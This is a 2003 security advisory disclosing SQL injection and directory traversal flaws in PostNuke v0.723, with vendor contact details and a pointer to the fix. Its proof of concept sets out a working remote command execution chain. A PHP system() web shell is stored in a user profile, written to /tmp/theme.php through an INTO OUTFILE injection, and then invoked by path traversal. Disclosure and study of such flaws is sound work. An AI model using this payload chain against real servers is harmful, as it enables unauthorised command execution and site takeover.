Postnuke v0.723 has SQL injection and directory traversal vulnerabilities which allow an attacker to view directories and perform remote command execution.
c7174c9efaf63c50640a797daaf52e208c587ea7527c490209c5b8d8130f87bc
Products: Postnuke v 0.723 (http://www.postnuke.com)
Date: 09 March 2003
Author: pokleyzz <pokleyzz_at_scan-associates.net>
Contributors: sk_at_scan-associates.net
shaharil_at_scan-associates.net
munir_at_scan-associates.net
URL: http://www.scan-associates.net
Summary: Postnuke v 0.723 SQL injection and directory traversing
Description
===========
Postnuke is Web Content Management System written in PHP and using mysql
as database backend.
Details
=======
There is multiple vulnerabilities in Postnuke v 0.723 as described below.
1) SQL Injection in Members_List module
There is lack in error checking in $sortby variable which is stripslashes.
This variable is used as SQL query to select postnuke member list.
ex:
http://[postnuke
site]/modules.php?op=modload&name=Members_List&file=index&letter=[username]&sortby=[sql
query]
2) Directory traversing through $theme variable
Attacker may include file any file named theme.php
ex:
http://[postnuke site]/index.php?theme=../../../../../../../../tmp
Vendor Response
===============
Vendor has been contacted on 24/02/2003 and fix is available from
http://www.postnuke.com
http://news.postnuke.com/modules.php?op=modload&name=News&file=article&sid=2378
Proof of concept
================
Postnuke remote command execution
requirement:
- PostNuke v0.723 maybe other
- PostNuke user
- Mysql user must have permision to select into outfile (FILE_PREV)
1) Register as postnuke user.
2) Login as user you just registered. After login change your "Real name"
to something like "<?system($HTTP_GET_VARS[cmd])?>" or just
"<?system($cmd)?>"
3) Sql injection in "Members_List" modules.
Select user information into /tmp/theme.php
.
http://[postnuke
site]/modules.php?op=modload&name=Members_List&file=index&letter=[your
username]&sortby=uname+into+outfile+'/tmp/theme.php'%23
4) Directory traversing in $theme variable
Run command on server
http://[postnuke
site]/index.php?theme=../../../../../../../../tmp&cmd=[command]